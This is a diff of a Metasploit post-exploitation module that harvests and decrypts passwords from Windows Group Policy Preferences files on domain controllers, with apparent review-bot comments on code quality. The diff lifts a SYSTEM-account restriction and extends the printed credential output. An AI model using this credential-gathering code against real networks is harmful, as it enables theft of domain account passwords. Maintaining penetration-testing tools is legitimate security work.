diff --git a/modules/post/windows/gather/credentials/gpp.rb b/modules/post/windows/gather/credentials/gpp.rb index a59d54491c..e935daa890 100644 --- a/modules/post/windows/gather/credentials/gpp.rb +++ b/modules/post/windows/gather/credentials/gpp.rb @@ -28,9 +28,6 @@ class Metasploit3 < Msf::Post Users can specify ALL=True to target all domains and their domain controllers on the network. - - This module must be run under a domain user or the user will not have appropriate - permissions to read files from the domain controller(s). }, 'License' => MSF_LICENSE, 'Author' =>[ @@ -58,11 +55,6 @@ class Metasploit3 < Msf::Post end def run - if is_system? - print_error "This needs to be run as a Domain User, not SYSTEM" - return nil - end - dcs = [] paths = [] @@ -87,7 +79,7 @@ class Metasploit3 < Msf::Post dcs << found_dcs[0] unless found_dcs.to_a.empty? end elsif datastore['CURRENT'] - dcs << get_domain_controller() + dcs << get_domain_controller else print_error "Invalid Arguments, please supply one of CURRENT, ALL or DOMAINS arguments" return nil @@ -156,6 +148,15 @@ class Metasploit3 < Msf::Post user = node.attributes['userName'] newname = node.attributes['newName'] disabled = node.attributes['acctDisabled'] + action = node.attributes['action'] + expires = node.attributes['expires'] + never_expires = node.attributes['neverExpires'] + description = node.attributes['description'] + full_name = node.attributes['fullName'] + no_change = node.attributes['noChange'] + change_logon = node.attributes['changeLogon'] + sub_authority = node.attributes['subAuthority'] + changed = node.parent.attributes['changed'] # n.b. parent attribute. # Check if policy also specifies the user is renamed. if !newname.to_s.empty? 
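Review bot: Of the nine attribute reads added in the last hunk, only `changed` is consumed (by the updated print_good later in the file); `action`, `expires`, `never_expires`, `description`, `full_name`, `no_change`, `change_logon` and `sub_authority` are assigned and never read, which `ruby -w` reports as unused locals and which a reader will take as half-finished work. Either fold the ones that matter into the print_good / db record or drop the dead assignments. The parsing loop these lines belong to starts and ends outside the hunk, so I may be missing a later use, but none is visible in the diff.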
@@ -166,7 +167,7 @@ class Metasploit3 < Msf::Post # UNICODE conversion pass = pass.unpack('v*').pack('C*') - print_good("DOMAIN CONTROLLER: #{domain_controller} USER: #{user} PASS: #{pass} DISABLED: #{disabled}") + print_good "DOMAIN CONTROLLER: #{domain_controller} USER: #{user} PASS: #{pass} DISABLED: #{disabled} CHANGED: #{changed}" if session.db_record source_id = session.db_record.id @@ -203,7 +204,7 @@ class Metasploit3 < Msf::Post #enum_domains.rb def enum_domains print_status "Enumerating Domains on the Network..." - domain_enum = 80000000 # SV_TYPE_DOMAIN_ENUM = hex 80000000 + domain_enum = 80000000 # SV_TYPE_DOMAIN_ENUM buffersize = 500 result = client.railgun.netapi32.NetServerEnum(nil,100,4,buffersize,4,4,domain_enum,nil,nil) # Estimate new buffer size on percentage recovered. @@ -222,14 +223,15 @@ class Metasploit3 < Msf::Post base = 0 domains = [] mem = client.railgun.memread(startmem, 8*count) - count.times{|i| + count.times do |i| x = {} x[:platform] = mem[(base + 0),4].unpack("V*")[0] nameptr = mem[(base + 4),4].unpack("V*")[0] x[:domain] = client.railgun.memread(nameptr,255).split("\0\0")[0].split("\0").join domains << x base = base + 8 - } + end + return domains end @@ -277,7 +279,9 @@ class Metasploit3 < Msf::Post value = v.data open_key.close rescue + print_error e.message end + return value end @@ -289,9 +293,15 @@ class Metasploit3 < Msf::Post v_name = "DCName" domain = reg_getvaldata(subkey, v_name) rescue - print_error "This host is not part of a domain." + print_error e.message + end + + if domain.nil? + print_error "No domain controller retrieved - is this machine part of a domain?" + return nil + else + return domain.sub!(/\\\\/,'') end - return domain.sub!(/\\\\/,'') end end
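Review bot: `domain_enum = 80000000` is a decimal literal, and the comment text removed in this hunk (`= hex 80000000`) was the only hint that the value was meant to be hexadecimal; SV_TYPE_DOMAIN_ENUM is `0x80000000`, so the value handed to NetServerEnum is a different bit pattern from the constant the comment names. Write it as `domain_enum = 0x80000000 # SV_TYPE_DOMAIN_ENUM` so literal and name agree. enum_domains continues past the end of the hunk.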
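Review bot: `return domains` as the final statement of enum_domains is a bare trailing `return`; with the loop now a `do … end` block the method's last expression can simply be `domains`. In the same loop `base = base + 8` reads more idiomatically as `base += 8` and `mem[(base + 0),4]` as `mem[base, 4]`. The method begins outside this hunk.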
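Review bot: `print_error e.message` in the rescue clause of the registry-read method refers to `e`, but the unchanged `rescue` line above it binds no variable, so the handler raises NameError (hiding the original exception) unless an `e` is assigned earlier in the method, whose start is outside the hunk; change that line to `rescue => e`. The same unbound `e` is repeated in the next hunk (`get_domain_controller`). Separately, `open_key.close` sits inside the protected body, so a failure in `v.data` leaves the key handle open; moving the close into an `ensure` clause would fix that, though where `open_key` is opened is not visible here.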
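Review bot: `return domain.sub!(/\\\\/,'')` keeps the bang form, which returns nil when the leading `\\` is absent, so the new `domain.nil?` guard is sidestepped and the caller in run (`dcs << get_domain_controller`) still pushes nil into `dcs`; use the non-mutating `return domain.sub(/\\\\/, '')`. The `if domain.nil? … else … end` then flattens to a guard clause, `return nil if domain.nil?`, followed by the sub as the method's last expression.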